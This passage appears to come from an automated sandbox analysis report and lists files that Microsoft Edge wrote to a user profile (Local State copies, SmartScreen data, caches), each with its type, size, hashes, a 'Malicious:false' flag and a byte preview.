                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF425c4.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090739758425852
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMnwuF9hDO6vP6O+Ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6Qtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:53E6174A7A8AD736B51551C38034DA87
                                                                                                                                                                                                                                                                                          SHA1:ACE50599E966385A160D82A2DF639A1AA4269F95
                                                                                                                                                                                                                                                                                          SHA-256:DBAA78CAD6D2D1F64E8F8E17271FEBE4FA8E8211DB2D3E37844340FF4D5883E0
                                                                                                                                                                                                                                                                                          SHA-512:FDE2C14EAB00940FCA1BE718613F6D7F0F83C2060B3370E277F93C014FE72EB792B3E387C22252313FBDB9F078EEC36BD9562E9E9AB81B03F98B422CC14FF4B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF44c57.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090739758425852
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMnwuF9hDO6vP6O+Ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6Qtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:53E6174A7A8AD736B51551C38034DA87
                                                                                                                                                                                                                                                                                          SHA1:ACE50599E966385A160D82A2DF639A1AA4269F95
                                                                                                                                                                                                                                                                                          SHA-256:DBAA78CAD6D2D1F64E8F8E17271FEBE4FA8E8211DB2D3E37844340FF4D5883E0
                                                                                                                                                                                                                                                                                          SHA-512:FDE2C14EAB00940FCA1BE718613F6D7F0F83C2060B3370E277F93C014FE72EB792B3E387C22252313FBDB9F078EEC36BD9562E9E9AB81B03F98B422CC14FF4B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                          MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                          SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                          SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                          SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):47
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                          MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                          SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                          SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                          SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                          MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                          SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                          SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                          SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):81
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                          MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                          SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                          SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                          SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):130439
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                          MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                          SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                          SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                          SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                          MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                          SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                          SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                          SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):57
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                          MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                          SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                          SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                          SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                          MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                          SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                          SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                          SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):575056
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                          MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                          SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                          SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                          SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):460992
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                          MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                          SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                          SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                          SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                          MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                          SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                          SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                          SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:uriCache_

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):179
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0013688882706635
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQ0P:YWLSGTt1o9LuLgfGBPAzkVj/T8lQc
                                                                                                                                                                                                                                                                                          MD5:FADD902B07911F5F806DFFFC2477AC5B
                                                                                                                                                                                                                                                                                          SHA1:949920243E55156D7F6956F9D1F2D22F11A27218
                                                                                                                                                                                                                                                                                          SHA-256:3B26C672C170D39549365677F78AAECBE5FE0255FA283D8041775344F39A9C0B
                                                                                                                                                                                                                                                                                          SHA-512:C2CA885304FE1FB0377442E971B24FB37DF5FAD549FC86B11DA8D1760B319619DC0B7A23C82B2E37334CA59ECCB4E028DA9CC9F3E75E3A50110C7F86F9C0DAF4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735761560516603}]}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                          MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                          SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                          SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
